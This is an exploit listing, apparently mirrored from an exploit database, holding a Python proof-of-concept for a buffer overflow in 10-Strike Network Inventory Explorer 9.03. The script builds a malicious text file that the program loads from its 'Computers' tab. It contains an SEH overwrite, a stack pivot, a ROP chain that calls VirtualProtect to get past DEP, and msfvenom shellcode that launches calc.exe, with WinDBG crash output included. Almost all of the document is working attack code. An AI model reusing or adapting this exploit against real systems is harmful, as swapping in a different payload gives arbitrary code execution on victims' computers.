Exploit for 10-Strike Network Inventory Explorer 9.03 Buffer Overflow

Name: Exploit for 10-Strike Network Inventory Explorer 9.03 Buffer Overflow
Rating: 5 (168 reviews)
2020-03-30 | CVSS 0.6
## https://sploitus.com/exploit?id=PACKETSTORM:156972
#!/usr/bin/python  
  
# Exploit Title: 10-Strike Network Inventory Explorer - Read-from-file Buffer Overflow (SEH)(ROP)  
# Version: 9.03  
# Software Link: https://www.10-strike.com/networkinventoryexplorer/network-inventory-setup.exe  
# Date: 2020-03-30  
# Exploit Author: Hodorsec (hodor@hodorsec.com / hodorsec@protonmail.com)  
# Vendor Homepage: https://www.10-strike.com  
# Tested on: Win8.1 x64 - Build 9600  
  
# Description:   
# - Exploits the functionality to load a list of computers from a file  
# - Some DLL's and the main EXE don't rebase, which allowed for some instruction reusage for ROP  
# - Used a jump after ROP to go to a buffer for more space  
  
# Reproduction:  
# - Run the script, a TXT file will be generated  
# - Open the program and click on tab "Computers"  
# - Click the button "From Text File" and select the generated TXT file  
# - Clck OK and check results  
  
# WinDBG initial crash output:  
# (f54.f48): Access violation - code c0000005 (first chance)  
# First chance exceptions are reported before any exception handling.  
# This exception may be expected and handled.  
# *** ERROR: Module load completed but symbols could not be loaded for C:\Program Files (x86)\10-Strike Network Inventory Explorer\NetworkInventoryExplorer.exe  
# eax=000013d3 ebx=0018f778 ecx=000002e4 edx=0018f7c0 esi=08fd8d8c edi=00190000  
# eip=00402b47 esp=0018f6e4 ebp=0018f73c iopl=0 nv up ei pl nz na po cy  
# cs=0023 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00210203  
# NetworkInventoryExplorer+0x2b47:  
# 00402b47 f3a5 rep movs dword ptr es:[edi],dword ptr [esi]  
# 0:000> g  
# (f54.f48): Access violation - code c0000005 (first chance)  
# First chance exceptions are reported before any exception handling.  
# This exception may be expected and handled.  
# eax=0018f700 ebx=00420244 ecx=00000002 edx=08fd854c esi=0048b11c edi=08f4f388  
# eip=41414141 esp=0018f8dc ebp=41414141 iopl=0 nv up ei pl nz na po nc  
# cs=0023 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00210202  
# 41414141 ?? ???  
  
import sys, struct  
  
filename = "poc_10_strike_nie.txt"  
  
# Maximum length  
maxlen = 5000  
  
# Offsets  
crash_esi = 2145 # Initial space until ESI buffer filling  
crash_seh = 217 # SEH  
crash_nseh = crash_seh - 4 # NSEH  
landingpad = 310 # Space for RET NOP landingpad after stackpivoting  
  
# Shellcode  
# msfvenom -p windows/exec cmd=calc.exe -v shellcode -f python -b "\x0a\x0d\x00\x5c\x3a" exitfunc=thread  
# Payload size: 220 bytes  
shellcode = b""  
shellcode += b"\xda\xdb\xd9\x74\x24\xf4\x5f\x2b\xc9\xbd\x06"  
shellcode += b"\xa7\x5d\x4b\xb1\x31\x83\xef\xfc\x31\x6f\x14"  
shellcode += b"\x03\x6f\x12\x45\xa8\xb7\xf2\x0b\x53\x48\x02"  
shellcode += b"\x6c\xdd\xad\x33\xac\xb9\xa6\x63\x1c\xc9\xeb"  
shellcode += b"\x8f\xd7\x9f\x1f\x04\x95\x37\x2f\xad\x10\x6e"  
shellcode += b"\x1e\x2e\x08\x52\x01\xac\x53\x87\xe1\x8d\x9b"  
shellcode += b"\xda\xe0\xca\xc6\x17\xb0\x83\x8d\x8a\x25\xa0"  
shellcode += b"\xd8\x16\xcd\xfa\xcd\x1e\x32\x4a\xef\x0f\xe5"  
shellcode += b"\xc1\xb6\x8f\x07\x06\xc3\x99\x1f\x4b\xee\x50"  
shellcode += b"\xab\xbf\x84\x62\x7d\x8e\x65\xc8\x40\x3f\x94"  
shellcode += b"\x10\x84\x87\x47\x67\xfc\xf4\xfa\x70\x3b\x87"  
shellcode += b"\x20\xf4\xd8\x2f\xa2\xae\x04\xce\x67\x28\xce"  
shellcode += b"\xdc\xcc\x3e\x88\xc0\xd3\x93\xa2\xfc\x58\x12"  
shellcode += b"\x65\x75\x1a\x31\xa1\xde\xf8\x58\xf0\xba\xaf"  
shellcode += b"\x65\xe2\x65\x0f\xc0\x68\x8b\x44\x79\x33\xc1"  
shellcode += b"\x9b\x0f\x49\xa7\x9c\x0f\x52\x97\xf4\x3e\xd9"  
shellcode += b"\x78\x82\xbe\x08\x3d\x6c\x5d\x99\x4b\x05\xf8"  
shellcode += b"\x48\xf6\x48\xfb\xa6\x34\x75\x78\x43\xc4\x82"  
shellcode += b"\x60\x26\xc1\xcf\x26\xda\xbb\x40\xc3\xdc\x68"  
shellcode += b"\x60\xc6\xbe\xef\xf2\x8a\x6e\x8a\x72\x28\x6f"  
  
# ROP chain  
def create_rop_chain():  
# rop chain generated with mona.py - www.corelan.be  
rop_gadgets = [  
0x7c344efe, # POP EDX # RETN [MSVCR71.dll]   
0x61e9b30c, # ptr to &VirtualProtect() [IAT sqlite3.dll]  
0x010283e5, # MOV EAX,DWORD PTR DS:[EDX] # RETN [NetworkInventoryExplorer.exe]   
0x010296a1, # XCHG EAX,ESI # ADD AL,BYTE PTR DS:[ECX] # RETN [NetworkInventoryExplorer.exe]   
0x61e7555f, # POP EBP # RETN [sqlite3.dll]   
0x61e63eaf, # & push esp # ret 0x04 [sqlite3.dll]  
0x7c37678f, # POP EAX # RETN [MSVCR71.dll]   
0xfffffdff, # Value to negate, will become 0x00000201  
0x7c34d749, # NEG EAX # RETN [MSVCR71.dll]   
0x0102a8a0, # POP EBX # RETN [NetworkInventoryExplorer.exe]   
0xffffffff, #   
0x61e0579d, # INC EBX # RETN [sqlite3.dll]   
0x0102104a, # ADD EBX,EAX # RETN [NetworkInventoryExplorer.exe]   
0x7c3458e6, # POP EDX # RETN [MSVCR71.dll]   
0xffffffc0, # Value to negate, will become 0x00000040  
0x7c351eb1, # NEG EDX # RETN [MSVCR71.dll]   
0x7c369c4a, # POP ECX # RETN [MSVCR71.dll]   
0x7c38dfd7, # &Writable location [MSVCR71.dll]  
0x7c34a40e, # POP EDI # RETN [MSVCR71.dll]   
0x0101da30, # RETN (ROP NOP) [NetworkInventoryExplorer.exe]  
0x01014218, # POP EAX # RETN [NetworkInventoryExplorer.exe]   
0x90909090, # nop  
0x01014244, # PUSHAD # RETN [NetworkInventoryExplorer.exe]   
]  
return ''.join(struct.pack('<I', _) for _ in rop_gadgets)  
rop_chain = create_rop_chain()  
  
# NOPPING  
retnop = struct.pack("<L", 0x61e0103e) # RET # sqlite3.dll  
prenop = "\x90" * 200 # Pre NOP's after jumping back in stack, sledding until shellcode  
postnop = "\x90" * 16 # Post NOP's after running ROP chain to disable DEP  
  
# Jump back on stack for payload space  
jmpback = "\xe9\x9f\xf9\xff\xff" # jmp 0xfffff9a4 # Jump back on stack for more space  
  
# Prefix  
prefix = "A" * crash_nseh # Junk until NSEH  
nseh = "B" * 4 # Junk again, no use for NSEH  
seh = struct.pack("<L", 0x0101ce0b) # ADD ESP,0BDC # RETN 0x0C ** [NetworkInventoryExplorer.exe] ** # Stackpivot  
suffix = prenop # Prenopping until shellcode  
suffix += shellcode # Magic!  
suffix += retnop * landingpad # RET NOP as a landingpad after stackpivot, still having DEP enabled  
suffix += rop_chain # Disable DEP  
suffix += postnop # Old school NOP-sledding  
suffix += jmpback # Jump! Just like van Halen  
suffix += "C" * (maxlen - len(prefix + nseh + seh + suffix)) # Junk for filling  
  
# Concatenate string for payload  
payload = prefix + nseh + seh + suffix # Put it all together  
  
try:  
file = open(filename,"wb")  
file.write(payload)  
file.close()  
print "[+] File " + filename + " with size " + str(len(payload)) + " created successfully"  
except:  
print "[!] Error creating file!"  
sys.exit(0)